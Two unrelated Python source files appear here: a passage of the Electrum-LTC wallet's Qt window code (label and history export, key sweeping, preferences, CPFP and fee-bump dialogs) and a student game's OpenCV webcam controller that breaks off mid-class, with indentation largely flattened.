with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum-ltc_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-ltc-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
from electrum_ltc.wallet import sweep_preparations
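        # sweep_preparations() asks the network for the UTXOs controlled by the entered
        # keys and returns them together with the matching keypairs for signing.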
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_pk(), self.network)
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(get_address())
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
except BaseException as e:
self.show_message(str(e))
return
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_ltc.i18n import languages
lang_combo.addItems(list(languages.values()))
try:
            index = list(languages.keys()).index(self.config.get("language", ''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
self.fee_slider.update()
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.is_dynfee())
dynfee_cb.setToolTip(_("Use fees recommended by the server."))
fee_widgets.append((dynfee_cb, None))
dynfee_cb.stateChanged.connect(on_dynfee)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(self.config.get('use_rbf', True))
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
            _('and you will be able to replace them, while they are unconfirmed, with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', x == Qt.Checked)
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
self.fee_unit = self.config.get('fee_unit', 0)
fee_unit_label = HelpLabel(_('Fee Unit') + ':', '')
fee_unit_combo = QComboBox()
fee_unit_combo.addItems([_('sat/byte'), _('mLTC/kB')])
fee_unit_combo.setCurrentIndex(self.fee_unit)
def on_fee_unit(x):
self.fee_unit = x
self.config.set_key('fee_unit', x)
self.fee_slider.update()
fee_unit_combo.currentIndexChanged.connect(on_fee_unit)
fee_widgets.append((fee_unit_label, fee_unit_combo))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['LTC', 'mLTC', 'bits']
        msg = _('Base unit of your wallet.')\
              + '\n1 LTC = 1000 mLTC.\n' \
              + _('This setting affects the amount fields in the Send tab.') + ' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'LTC':
self.decimal_point = 8
elif unit_result == 'mLTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_ltc import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
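        # Worked example (hypothetical numbers, for illustration only): with a
        # configured rate of fee_per_kb() == 10000 sat/kB and total_size == 500
        # bytes for parent + child, the suggested fee is 10000 * 500 / 1000 = 5000 sat.
        # The slider callback below applies the same formula, capped at max_fee.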
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
        vbox.addWidget(QLabel(_('New fee') + ':'))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
|
FinalProject_Controller.py
|
"""
This is the controller file for our Ball Drop Game. It provides the
functions that read user input (in our case, from the webcam feed) to control
the gameplay mechanics.
"""
import pygame
from threading import Thread
import time
import sys
# sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages') # in order to import cv2 under python3
import cv2
# sys.path.append('/opt/ros/kinetic/lib/python2.7/dist-packages') # append back in order to import rospy
import numpy as np
class ImageController:
""" Checks for user input from placing the blocks on the wall projection and
creates a new block based on the properties of this block.
"""
def __init__(self):
""" Initializes OpenCV set up
"""
# Start capturing video from webcam
self.cap = cv2.VideoCapture(0)
        # Sets the number of frames stored in the internal buffer. Since the
        # buffer only holds 2 frames, we are always reading a near-live feed.
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 2)
        # self.FPS is the delay between frames in seconds: 1/(desired frames per second).
        # Our webcam runs at 30 FPS, so we wait 1/30 s between reads.
self.FPS = 1/30
self.FPS_MS = int(self.FPS * 1000)
# Start frame retrieval thread
self.thread = Thread(target=self.update, args=())
# Stops this thread if the other program stops running
self.thread.daemon = True
self.thread.start()
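        # Note: self.frame is only set after update() completes its first successful
        # read, so callers (e.g. the __main__ test loop below) catch AttributeError
        # until the first frame arrives.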
# Sets font
self.font = cv2.FONT_HERSHEY_COMPLEX
        # Gets the width and height of the camera frame
self.width = int(self.cap.get(3))
self.height = int(self.cap.get(4))
# Sets boolean determining whether to resize frame
self.resizeFrame = False
def get_resized_frame_size(self, new_ratio_width, new_ratio_height):
""" Gets the size of the resized frame given the desired aspect ratio
to resize the original frame by.
Parameters:
new_ratio_width: Ex. for an aspect ratio of 16x9, the user inputs 16
new_ratio_height: Ex. for an aspect ratio of 16x9, the user inputs 9
Returns:
new_dim: new dimensions of frame after resize
"""
unit_len = self.width/new_ratio_width
new_dim = (int(unit_len*new_ratio_width), int(unit_len*new_ratio_height))
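        # Worked example (hypothetical numbers): for a 640x480 capture and a requested
        # 16x9 ratio, unit_len = 640/16 = 40, so new_dim = (640, 360) -- the width is
        # preserved and the height is derived from the requested aspect ratio.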
return new_dim
def resize_frame(self, frame, new_ratio_width, new_ratio_height):
""" Resize frame inputed to a new aspect ratio.
Parameters:
new_ratio_width: Ex. for an aspect ratio of 16x9, the user inputs 16
new_ratio_height: Ex. for an aspect ratio of 16x9, the user inputs 9
Returns:
new_frame: adjusted frame after resizing
"""
new_dim = self.get_resized_frame_size(new_ratio_width,new_ratio_height)
new_frame = cv2.resize(frame, new_dim)
return new_frame
def update(self):
""" This function is threaded. It updates self.frame automatically every
FPS
"""
while True:
if self.cap.isOpened():
(self.status, temp_frame) = self.cap.read()
if self.resizeFrame:
self.frame = self.resize_frame(temp_frame, 16, 9)
else:
self.frame = temp_frame
time.sleep(self.FPS)
def show_frames(self):
""" Displays mask and webcam feed and waits the desired FPS to sync up video
"""
cv2.imshow('Frame', self.frame)
cv2.imshow("Mask", self.mask)
cv2.waitKey(self.FPS_MS)
def create_trackbars(self):
""" Creates trackbars to calibrate the background. Sets lower and
upper HSV ranges so we can create a mask later of a certain color.
OpenCV HSV ranges: Hue(0-180), Saturation(0-255), Value(0-255). These
        values need to be calibrated and changed before the program can
function properly.
"""
cv2.namedWindow("Trackbars")
# Initialize values for trackbars
cv2.createTrackbar("L-H", "Trackbars", 0, 180, lambda x:x)
cv2.createTrackbar("L-S", "Trackbars", 25, 255, lambda x:x)
cv2.createTrackbar("L-V", "Trackbars", 0, 255, lambda x:x)
cv2.createTrackbar("U-H", "Trackbars", 180, 180, lambda x:x)
cv2.createTrackbar("U-S", "Trackbars", 255, 255, lambda x:x)
cv2.createTrackbar("U-V", "Trackbars", 255, 255, lambda x:x)
def create_hsv_mask(self):
""" Creates mask with HSV values from the trackbar. Adjusts in real time.
"""
# Convert frame into HSV color space
hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)
# Retrieves real time trackbar values.
l_h = cv2.getTrackbarPos("L-H", "Trackbars")
l_s = cv2.getTrackbarPos("L-S", "Trackbars")
l_v = cv2.getTrackbarPos("L-V", "Trackbars")
u_h = cv2.getTrackbarPos("U-H", "Trackbars")
u_s = cv2.getTrackbarPos("U-S", "Trackbars")
u_v = cv2.getTrackbarPos("U-V", "Trackbars")
lower_color = np.array([l_h, l_s, l_v])
upper_color = np.array([u_h, u_s, u_v])
mask = cv2.inRange(hsv, lower_color, upper_color)
# Small square to erode image by.
kernel = np.ones((5, 5), np.uint8)
# Erode makes the object we are masking smaller. Cleans up data by taking
# away random small dots
self.mask = cv2.erode(mask, kernel)
def detect_rectangle(self):
""" Uses contours generated from the mask to detect whether a
rectangle exists in the frame.
Returns:
isRectangle: boolean representing whether there is a rectangle in frame
            x: x position of a corner point of the detected rectangle (used to place the label text)
            y: y position of a corner point of the detected rectangle (used to place the label text)
"""
# There is no rectangle at the beginning
isRectangle = False
# Checking OpenCV version because the findContours function is different.
if int(cv2.__version__[0]) > 3:
# Opencv 4.x.x
# Looking for contours in mask. Outputs points in the image.
contours, _ = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
else:
# Opencv 3.x.x
_, contours, _ = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
area = cv2.contourArea(cnt)
                # Approximate the contour as a polygon; epsilon is 2% of the
                # contour perimeter, and True marks the curve as closed.
approx = cv2.approxPolyDP(cnt, 0.02*cv2.arcLength(cnt, True), True)
# Get xy positions to place the text
x = approx.ravel()[0]
y = approx.ravel()[1]
# Only detect objects that are bigger to remove noise
if area > 400:
# Draws points found in contours
cv2.drawContours(self.frame, [approx], 0, (0, 0, 0), 5)
# If it detects 4 outlines, then a rectangle exists
if len(approx) == 4:
# Displays text on frame confirming there is a rectangle
cv2.putText(self.frame, "Rectangle", (x, y), self.font, 1, (0, 0, 0))
isRectangle = True
        if isRectangle:
return (isRectangle, x, y)
else:
return (False, 0, 0)
def end_capture(self):
"""
Ends current video capture
"""
self.cap.release()
cv2.destroyAllWindows()
class KeyboardController:
""" Checks for user input from clicking keys on the keyboard in order to
move the ball.
Attributes:
is_pressed: boolean indicating whether a key is pressed
key: the event key, shows which key is pressed (up arrow, down
arrow, side arrows)
"""
def __init__(self, is_pressed, key):
""" Assigns provided parameters to a new KeyboardController object. The
attributes of this object will be checked within FinalProject_Model to
control the movement of the ball.
"""
